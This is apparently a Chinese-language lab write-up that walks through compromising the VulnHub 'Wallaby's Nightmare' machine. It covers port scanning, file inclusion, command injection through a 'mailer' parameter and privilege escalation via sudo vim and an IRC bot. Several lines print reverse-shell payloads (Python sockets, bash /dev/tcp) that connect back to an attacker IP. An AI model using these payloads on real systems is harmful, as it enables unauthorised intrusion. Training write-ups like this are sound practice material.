前言
⏰时间:2023.8.1
🗺️靶机地址: https://download.vulnhub.com/wallabys/wallabysnightmare102.rar
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝
信息收集
nmap探测主机端口和服务
┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap -A -T4 -p- 192.168.58.167
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:07:fc:70:20:98:f8:46:e4:8d:2e:ca:39:22:c7:be (RSA)
| 256 99:46:05:e7:c2:ba:ce:06:c4:47:c8:4f:9f:58:4c:86 (ECDSA)
|_ 256 4c:87:71:4f:af:1b:7c:35:49:ba:58:26:c1:df:b8:4f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Wallaby's Server
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
6667/tcp filtered irc
MAC Address: 00:0C:29:DF:68:78 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 198.047 days (since Sun Jan 15 11:16:44 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
访问80端口
url存在文件包含
测试直接被ban了
再扫一下是不是开放了别的端口
┌──(root㉿Erik)-[/home/eric/myfile]
└─# nmap -p- $T
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-01 12:45 HKT
Nmap scan report for 192.168.58.167
Host is up (0.000043s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
6667/tcp filtered irc
60080/tcp open unknown
MAC Address: 00:0C:29:DF:68:78 (VMware)
LFI模糊测试
直接访问60080
依旧可以包含
?page=后面设置变量测试,存在mailer
反弹SHELL
访问查看源码提示
可以执行命令
执行python的反弹shell
?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.153",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty;pty.spawn("/bin/bash")'
sudo -l看下
查看iptable的限制
清空防火墙策略
刚才6667端口显示filtered,现在在扫描看看
GET Waldo
可以利用/usr/bin/vim
sudo -u waldo /usr/bin/vim /etc/apache2/sites-available/000-default.conf
:!bash -i >& /dev/tcp/192.168.58.153/6666 0>&1
GET wallaby&root
irssi -c 192.168.58.167 -p 6667 -n wallabyschat
/list #查看频道
/join wallabyschat #加入频道
尝试执行命令 .run ls
查看进程
waldo@ubuntu:/home/waldo$ ps aux | grep waldo
waldo 676 0.0 0.3 29416 3104 ? Ss Jul31 0:00 tmux new-session -d -s irssi
waldo在使用tmux运行irssi
然后执行命令kill进程
pkill -9 676
/nick waldo,修改用户名为waldo
运行bash反弹shell
.run bash -c 'bash -i >& /dev/tcp/192.168.58.153/8888 0>&1'
sudo su